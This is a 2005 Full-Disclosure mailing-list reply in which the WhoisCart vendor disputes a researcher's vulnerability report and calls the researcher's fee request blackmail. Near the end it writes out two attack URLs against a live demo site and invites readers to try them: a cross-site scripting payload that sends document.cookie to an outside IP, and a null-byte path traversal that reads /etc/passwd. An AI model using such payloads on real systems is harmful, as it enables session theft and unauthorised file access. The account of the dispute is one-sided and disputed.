Re: [Full-disclosure] Multiple Vulnerabilities in Saeven.net's WhoisCart software.

["S. Alexandre M. Lemaire" <saeven@xxxxxxxxxx>]

It's unfortunate that a community whose posts are meant to be useful, become 
littered with individuals who result to abasement and personal insults. It's 
convenient however that only the last few bits of a conversation between myself 
and Elzar (aka Vic Fryzel) figure as basis and closing statement vulnerability 
report which this reply is intended to:

http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034690.html

To clarify the situation, since we're on open grounds here, I'll post the 
pertinent emails.  This is what I get in my inbox at the end of a normal day:

Email #1
_______
Hello.

My name is Vic Fryzel, and I am a private security consultant. Recently, I have 
found a major vulnerability in your WhoisCart software that allows for 
unauthorized client and administrative logins. I'm mailing in hopes of 
privately disclosing this vulnerability to you. My services come with a fee of 
$500 USD per vulnerability, with half of that fee paid up front, and the other 
half paid upon delivery of the vulnerability.Delivery of the vulnerability will 
come in a detailed report,
stating how to reproduce the vulnerability, why the vulnerability occurs, and 
how to fix the vulnerability. The second half of the payment should come upon 
your successful reproduction of the vulnerability, which in this case should 
not be at all hard.

Thankyou for your time.
Warm regards,
Vic Fryzel
vic@xxxxxxxxxxxxx


Response #1 (from myself)
____________________
This message is definitely difficult to digest at its contents come unfounded.  
Unfortunately we cannot honor it as is, since you provide no basis, or proof 
for what you suggest.  Further, the grounds on which you present this 
opportunistic proposal are legally unsound; whilst not interested in pursuing 
legalities however, I'll extend you a chance to first prove your claim without 
initially disclosing the substance of what you suggest.  If proven, we can 
discuss a contractual agreement, where we could also dicuss your fee for the 
consultancy; and viability of contract.  Signed and agreed, we'll gladly 
exchange your fee for the solution to the problem you suggest exists.

    I've installed a whois.cart for you at:
    (url removed)

    My request is that you give me the particulars of the first hosting account 
listed in the hosts section.  If you can give me these details within 12 hours, 
I will gladly entertain your proposal, and continue discussion with you as 
applicable to your initial proposal, and the aforementioned engagements.

____________________

After this point the dodgy conversations continued after I'd made a test 
environment fully available to Vic.  Vic couldn't make good on his initial 
claim, and never was able to reveal a single thing.  He later admits:


Vic Fryzel aka Elzar Stuffenbach : 6/20/2005 11:05 PM:
"Hey,Ah; I'm pretty sure that last night I was able to duplicate this
vulnerability in more places, but I'll take your word for it. Regardless, I
was "wrong" in my initial findings. However, I have a new finding, and I
don't have SSH access to your test server. I can prove it to you, come up
with a test environment for proof."


The falsified claims and unfounded "new vulnerabilities"  (new attempts at a 
quick $500?) continue for another 3-4 emails, something here, there (in a 
Seussian dizziness) and in closure to a string of resultless attempts Vic 
attempts anew:

Vic Fryzel aka Elzar Stuffenbach : 6/22/2005 11:05 PM:
"Hey Alexandre, so, I've been able to actually recreate the first vulnerability 
(javascript), under a different scenario on your test setup.Let me know how 
you'd like to proceed.Vic"

Still however, the hosting item in the admin list was never yet revealed! It 
was obvious then, that Vic couldn't make good on his claim - what credibility 
is then left?  None.  Blackmail attempts aren't all that new to any software 
company.  We'll of course dismiss the affair, and thank him for his efforts.  
Elzar concluded instead with an email which resorted to insults, to which I 
replied a message which was only conveniently partially copied in his post here 
- I'll paste it in its entirety here - seems he left out the part that clearly 
stated his efforts had failed:

____________________
I'll indulge your comments.

    The truth is that I don't maintain the work on whois.cart currently. I have 
a staff of 13 people working for me right now, the developments are intense and 
I don't have the time to monitor them as I usually would.  They package and 
operate independently from myself.  My user community knows well (as I post 
frequent updates in the forums) that I'm currently vested into
our other project, our helpdesk.  We have a user base of 3000+, you aren't the 
only one to submit bug reports - note also that the people that work for me, 
aren't bored teenagers.  They are people with M.Scs and PhDs in computer 
science and related fields, who've agreed to partake in the whois.cart project 
on their spare time initially.  Your concern for security, is not
exclusive.

    Calling me a liar doesn't change the fact that Sunday's claim, still 
unfounded, has you upset at me just today for some completely unrelated and 
absurd reason.  Admit that from my point of view, this is absolutely 
outlandish.  More than 48 hours have passed during which you could have 
substantiated your claim.

    I'll leave the testbed running 2.2.80 until Friday as promised.  Again, if 
you can make good on your initial claim, I'll honor it to all ends even though 
your propositions are increasedly shady, and that you've resulted to insults 
and abasement in the process.  We're people of our word, and I'llhold to that - 
whatever your motives are.  Tact goes a longer way though, we generously reward 
people in our user community that do genuinely find what you had claimed to 
have found.
____________________

Never a peep past this. What is interesting though, is that instead of posting 
REAL links to the cart in his report - we get fictitious links - why not try it 
for yourselves?

http://yourdomain.com/whoiscart/profile.php?page=INSERT_JAVASCRIPT_HERE

becomes

http://whoiscart.net/demo/profile.php?page=%3Cbody+onload%3Ddocument.forms%5B0%5D.submit%28document.cookie%29%3E%3Cform+name%3Dform1+action%3Dhttp%3A%2F%2F12.202.41.221%2F%7Evic%2Ftest.php%3E%3C%2Fform%3E%3C%2Fbody%3E

Further, the file-browse fabrication would work like this:

http://whoiscart.net/demo/index.php?language=../../../../../../../../../../../../../etc/passwd%00

Lastly, as reply to the "Workaround" paragraph, Elzar brings up completely 
unrelated material into something that has nothing to do with Whois.Cart!  
What's worse, is vic's own website, no links work, script errors appear left 
and right - these things are taken into consideration when such a claim is 
made.  In the end, the claim followed his site's suit.  Unfounded, and 
unfinished.

From: Vic Fryzel <vic@xxxxxxxxxxxxx>
http://shellsage.com


This said, damage control has that unfortunately this individual's failed 
attempt at blackmail has resorted in a rather rapid propagation of these 
repeated falsifications all over vulnerability and
security report sites.  If you operate such a site and read this, I would 
appreciate if you remove this resource.  Do feel free to contact us first hand, 
myself personally at [saeven at saeven dot net] if you require any type of 
tangible testing or proof; I'll gladly give you access to the same test 
environment that Vic/Elzar was given.  All sites that we've contacted in 
conjunction with their reports based on this email have removed it immediately, 
aside from Secunia which have yet to act.  

Our product, and foremost, our users are of utmost importance, and we cannot 
have their peace of mind polluted with someones retort to a botched blackmail 
attempt.

Cordially.
Alexandre

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/